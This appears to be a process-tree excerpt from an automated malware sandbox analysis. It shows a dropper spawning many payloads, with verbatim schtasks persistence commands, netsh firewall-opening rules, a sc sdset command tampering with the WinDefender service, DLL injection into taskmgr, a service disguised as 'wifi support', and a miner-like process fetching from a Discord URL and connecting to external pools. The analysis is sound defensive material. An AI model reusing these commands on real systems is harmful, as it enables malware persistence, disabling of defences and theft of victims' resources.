C:\Users\Admin\Documents\SimpleAdobe\AnDuBYZ639CmLSQ8NUtablTR.exeC:\Users\Admin\Documents\SimpleAdobe\AnDuBYZ639CmLSQ8NUtablTR.exe2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Drops startup file
- Executes dropped EXE
- Accesses Microsoft Outlook profiles
- Adds Run key to start application
- Checks whether UAC is enabled
- Checks processor information in registry
- Suspicious use of SetWindowsHookEx
- outlook_office_path
- outlook_win_path
PID:4336 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST3⤵
- Creates scheduled task(s)
PID:1880 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST3⤵
- Creates scheduled task(s)
PID:2628 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\ProgramData\MSIUpdaterV131_999e43077df71fdfc52bd5232a22cf9d\MSIUpdaterV131.exe" /tn "MSIUpdaterV131_999e43077df71fdfc52bd5232a22cf9d HR" /sc HOURLY /rl HIGHEST3⤵
- Creates scheduled task(s)
PID:6124 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\ProgramData\MSIUpdaterV131_999e43077df71fdfc52bd5232a22cf9d\MSIUpdaterV131.exe" /tn "MSIUpdaterV131_999e43077df71fdfc52bd5232a22cf9d LG" /sc ONLOGON /rl HIGHEST3⤵
- Creates scheduled task(s)
PID:2512 -
C:\Users\Admin\AppData\Local\Temp\span37O_exJK0ZDM\jjuuAXZz7uWvEL2tOnUS.exe"C:\Users\Admin\AppData\Local\Temp\span37O_exJK0ZDM\jjuuAXZz7uWvEL2tOnUS.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
PID:1728 -
C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe"C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:6060 -
C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe"C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe"5⤵PID:6032
-
C:\Users\Admin\AppData\Local\Temp\1000012001\amert.exe"C:\Users\Admin\AppData\Local\Temp\1000012001\amert.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
PID:4332 -
C:\Users\Admin\1000013002\41759ac5d4.exe"C:\Users\Admin\1000013002\41759ac5d4.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4316 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com/account6⤵
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
PID:6136 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xe8,0xec,0xf0,0xc4,0xf4,0x7ffa5a0a9758,0x7ffa5a0a9768,0x7ffa5a0a97787⤵PID:756
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1564 --field-trial-handle=2152,i,7684821755774773372,9417113753898602529,131072 /prefetch:27⤵PID:516
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1796 --field-trial-handle=2152,i,7684821755774773372,9417113753898602529,131072 /prefetch:87⤵PID:3084
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1872 --field-trial-handle=2152,i,7684821755774773372,9417113753898602529,131072 /prefetch:87⤵PID:5796
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=3128 --field-trial-handle=2152,i,7684821755774773372,9417113753898602529,131072 /prefetch:17⤵PID:4752
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3136 --field-trial-handle=2152,i,7684821755774773372,9417113753898602529,131072 /prefetch:17⤵PID:5960
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3700 --field-trial-handle=2152,i,7684821755774773372,9417113753898602529,131072 /prefetch:17⤵PID:6192
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=4784 --field-trial-handle=2152,i,7684821755774773372,9417113753898602529,131072 /prefetch:17⤵PID:6732
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5048 --field-trial-handle=2152,i,7684821755774773372,9417113753898602529,131072 /prefetch:87⤵PID:7012
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --mojo-platform-channel-handle=4764 --field-trial-handle=2152,i,7684821755774773372,9417113753898602529,131072 /prefetch:17⤵PID:7032
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5416 --field-trial-handle=2152,i,7684821755774773372,9417113753898602529,131072 /prefetch:87⤵PID:6452
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5428 --field-trial-handle=2152,i,7684821755774773372,9417113753898602529,131072 /prefetch:87⤵PID:6532
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5692 --field-trial-handle=2152,i,7684821755774773372,9417113753898602529,131072 /prefetch:87⤵PID:5004
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5708 --field-trial-handle=2152,i,7684821755774773372,9417113753898602529,131072 /prefetch:87⤵PID:6692
-
C:\Users\Admin\AppData\Local\Temp\1000014001\6c91c65dee.exe"C:\Users\Admin\AppData\Local\Temp\1000014001\6c91c65dee.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:6216 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\ProgramData\MSIUpdaterV131_a5899eff6c87eb6c8acb1b5c9328dfae\MSIUpdaterV131.exe" /tn "MSIUpdaterV131_a5899eff6c87eb6c8acb1b5c9328dfae HR" /sc HOURLY /rl HIGHEST3⤵
- Creates scheduled task(s)
PID:3220 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\ProgramData\MSIUpdaterV131_a5899eff6c87eb6c8acb1b5c9328dfae\MSIUpdaterV131.exe" /tn "MSIUpdaterV131_a5899eff6c87eb6c8acb1b5c9328dfae LG" /sc ONLOGON /rl HIGHEST3⤵
- Creates scheduled task(s)
PID:3804 -
C:\Users\Admin\AppData\Local\Temp\span37O_exJK0ZDM\xpdQqUQXQWa0iRQg0uFa.exe"C:\Users\Admin\AppData\Local\Temp\span37O_exJK0ZDM\xpdQqUQXQWa0iRQg0uFa.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5388 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\ProgramData\MSIUpdaterV131_72e6459d9280e67b92be0cfd9c31abc7\MSIUpdaterV131.exe" /tn "MSIUpdaterV131_72e6459d9280e67b92be0cfd9c31abc7 HR" /sc HOURLY /rl HIGHEST3⤵
- Creates scheduled task(s)
PID:6116 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\ProgramData\MSIUpdaterV131_72e6459d9280e67b92be0cfd9c31abc7\MSIUpdaterV131.exe" /tn "MSIUpdaterV131_72e6459d9280e67b92be0cfd9c31abc7 LG" /sc ONLOGON /rl HIGHEST3⤵
- Creates scheduled task(s)
PID:2696 -
C:\Users\Admin\AppData\Local\Temp\span37O_exJK0ZDM\RqmEgRdyoc4TnpGWtipi.exe"C:\Users\Admin\AppData\Local\Temp\span37O_exJK0ZDM\RqmEgRdyoc4TnpGWtipi.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5752 -
C:\Users\Admin\Documents\SimpleAdobe\tboJHJHII9Q9oJjVSOI6pAdI.exeC:\Users\Admin\Documents\SimpleAdobe\tboJHJHII9Q9oJjVSOI6pAdI.exe2⤵
- Executes dropped EXE
PID:4264 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile3⤵PID:3392
-
C:\Users\Admin\Documents\SimpleAdobe\tboJHJHII9Q9oJjVSOI6pAdI.exe"C:\Users\Admin\Documents\SimpleAdobe\tboJHJHII9Q9oJjVSOI6pAdI.exe"3⤵
- Windows security bypass
- Executes dropped EXE
- Windows security modification
- Adds Run key to start application
- Checks for VirtualBox DLLs, possible anti-VM trick
- Drops file in Windows directory
- Modifies data under HKEY_USERS
PID:3872 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile4⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:5152 -
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"4⤵PID:5216
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes5⤵
- Modifies Windows Firewall
- Modifies data under HKEY_USERS
PID:4208 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile4⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:4296 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile4⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:4080 -
C:\Windows\rss\csrss.exeC:\Windows\rss\csrss.exe4⤵
- Executes dropped EXE
- Adds Run key to start application
- Manipulates WinMonFS driver.
- Drops file in Windows directory
PID:4164 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:5320 -
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F5⤵
- Creates scheduled task(s)
PID:764 -
C:\Windows\SYSTEM32\schtasks.exeschtasks /delete /tn ScheduledUpdate /f5⤵PID:2972
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:3348 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:5428 -
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exeC:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll5⤵
- Executes dropped EXE
PID:3108 -
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F5⤵
- Creates scheduled task(s)
PID:6064 -
C:\Windows\windefender.exe"C:\Windows\windefender.exe"5⤵
- Executes dropped EXE
PID:5844 -
C:\Windows\SysWOW64\cmd.execmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)6⤵PID:5636
-
C:\Windows\SysWOW64\sc.exesc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)7⤵
- Launches sc.exe
PID:1532 -
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F5⤵
- Creates scheduled task(s)
PID:9092 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Drops file in System32 directory
PID:8316 -
C:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exeC:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exe -xor=al2xoqueel0She4t -m=https://cdn.discordapp.com/attachments/1225871855328559147/1225878907014615161/kVYazCOZSwqudV?ex=6622bbb3&is=661046b3&hm=c80160577fcc82f0e337c537bdd214d60583ed75bb187a016d90f94471fc09b0& -pool tls://showlock.net:40001 -pool tls://showlock.net:443 -pool tcp://showlock.net:805⤵PID:6208
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:2104 -
C:\Users\Admin\AppData\Local\Temp\csrss\713674d5e968cbe2102394be0b2bae6f.exeC:\Users\Admin\AppData\Local\Temp\csrss\713674d5e968cbe2102394be0b2bae6f.exe5⤵PID:5180
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:4448 -
C:\Users\Admin\AppData\Local\Temp\csrss\1bf850b4d9587c1017a75a47680584c4.exeC:\Users\Admin\AppData\Local\Temp\csrss\1bf850b4d9587c1017a75a47680584c4.exe5⤵PID:9136
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵PID:6880
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F5⤵
- Creates scheduled task(s)
PID:5336 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵PID:7848
-
C:\Users\Admin\Documents\SimpleAdobe\Hst3lrLxOp00o64vOZXF5TK2.exeC:\Users\Admin\Documents\SimpleAdobe\Hst3lrLxOp00o64vOZXF5TK2.exe2⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:2732 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\ProgramData\WinTrackerSP\WinTrackerSP.exe" /tn "WinTrackerSP HR" /sc HOURLY /rl HIGHEST3⤵
- Creates scheduled task(s)
PID:3980 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\ProgramData\WinTrackerSP\WinTrackerSP.exe" /tn "WinTrackerSP LG" /sc ONLOGON /rl HIGHEST3⤵
- Creates scheduled task(s)
PID:1428 -
C:\Users\Admin\Documents\SimpleAdobe\mps245jJroRl14O6Z4MCwgJe.exeC:\Users\Admin\Documents\SimpleAdobe\mps245jJroRl14O6Z4MCwgJe.exe2⤵
- Executes dropped EXE
PID:1316 -
C:\Users\Admin\AppData\Local\Temp\u10k.0.exe"C:\Users\Admin\AppData\Local\Temp\u10k.0.exe"3⤵
- Executes dropped EXE
PID:660 -
C:\Users\Admin\AppData\Local\Temp\u10k.2\run.exe"C:\Users\Admin\AppData\Local\Temp\u10k.2\run.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:192 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe4⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
PID:1520 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe5⤵
- Suspicious use of SetWindowsHookEx
PID:2708 -
C:\Users\Admin\Documents\SimpleAdobe\lvwWiigbPRQHkX1WiI1R7O9N.exeC:\Users\Admin\Documents\SimpleAdobe\lvwWiigbPRQHkX1WiI1R7O9N.exe2⤵
- Modifies firewall policy service
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Blocklisted process makes network request
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Checks whether UAC is enabled
- Drops Chrome extension
- Drops file in System32 directory
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:3500 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"3⤵
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2192 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xe8,0xec,0xf0,0xc4,0xf4,0x7ffa5b149758,0x7ffa5b149768,0x7ffa5b1497784⤵PID:4772
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1536 --field-trial-handle=1788,i,5812663864734706129,14483284131516465567,131072 /prefetch:24⤵PID:3936
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2024 --field-trial-handle=1788,i,5812663864734706129,14483284131516465567,131072 /prefetch:84⤵PID:2668
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2096 --field-trial-handle=1788,i,5812663864734706129,14483284131516465567,131072 /prefetch:84⤵PID:3684
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2976 --field-trial-handle=1788,i,5812663864734706129,14483284131516465567,131072 /prefetch:14⤵PID:2900
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2984 --field-trial-handle=1788,i,5812663864734706129,14483284131516465567,131072 /prefetch:14⤵PID:4160
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=3884 --field-trial-handle=1788,i,5812663864734706129,14483284131516465567,131072 /prefetch:14⤵PID:5188
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=4600 --field-trial-handle=1788,i,5812663864734706129,14483284131516465567,131072 /prefetch:14⤵PID:5332
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4792 --field-trial-handle=1788,i,5812663864734706129,14483284131516465567,131072 /prefetch:84⤵PID:5428
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4944 --field-trial-handle=1788,i,5812663864734706129,14483284131516465567,131072 /prefetch:84⤵PID:5436
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4788 --field-trial-handle=1788,i,5812663864734706129,14483284131516465567,131072 /prefetch:84⤵PID:5404
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3708 --field-trial-handle=1788,i,5812663864734706129,14483284131516465567,131072 /prefetch:84⤵PID:5944
-
C:\Users\Admin\Documents\SimpleAdobe\zlbyhhvqluAa2YWd57tl7eT_.exeC:\Users\Admin\Documents\SimpleAdobe\zlbyhhvqluAa2YWd57tl7eT_.exe2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4756 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵PID:4720
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵
- Suspicious use of SetWindowsHookEx
PID:2540 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2540 -s 19364⤵
- Program crash
PID:4656 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4756 -s 5163⤵
- Program crash
PID:4540 -
C:\Users\Admin\Documents\SimpleAdobe\DOwOUFOet7eMC5vx2MOYygTD.exeC:\Users\Admin\Documents\SimpleAdobe\DOwOUFOet7eMC5vx2MOYygTD.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
PID:2572 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe3⤵PID:6060
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe3⤵PID:6068
-
C:\Users\Admin\Documents\SimpleAdobe\ABdncqG0qcBNNomxh8SNa7uR.exeC:\Users\Admin\Documents\SimpleAdobe\ABdncqG0qcBNNomxh8SNa7uR.exe2⤵
- Executes dropped EXE
PID:1172 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\ifzhwuog\3⤵PID:1080
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\sqfngwrn.exe" C:\Windows\SysWOW64\ifzhwuog\3⤵PID:4292
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" create ifzhwuog binPath= "C:\Windows\SysWOW64\ifzhwuog\sqfngwrn.exe /d\"C:\Users\Admin\Documents\SimpleAdobe\ABdncqG0qcBNNomxh8SNa7uR.exe\"" type= own start= auto DisplayName= "wifi support"3⤵
- Launches sc.exe
PID:4524 -
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" description ifzhwuog "wifi internet conection"3⤵
- Launches sc.exe
PID:3936 -
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" start ifzhwuog3⤵
- Launches sc.exe
PID:2208 -
C:\Windows\SysWOW64\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul3⤵
- Modifies Windows Firewall
PID:2328 -
C:\Users\Admin\Documents\SimpleAdobe\YeIXGSxWKaTAiDgamD7WXkA9.exeC:\Users\Admin\Documents\SimpleAdobe\YeIXGSxWKaTAiDgamD7WXkA9.exe2⤵
- Executes dropped EXE
- Accesses Microsoft Outlook profiles
- Adds Run key to start application
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:2676 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\ProgramData\MSIUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\MSIUpdaterV1.exe" /tn "MSIUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe HR" /sc HOURLY /rl HIGHEST3⤵
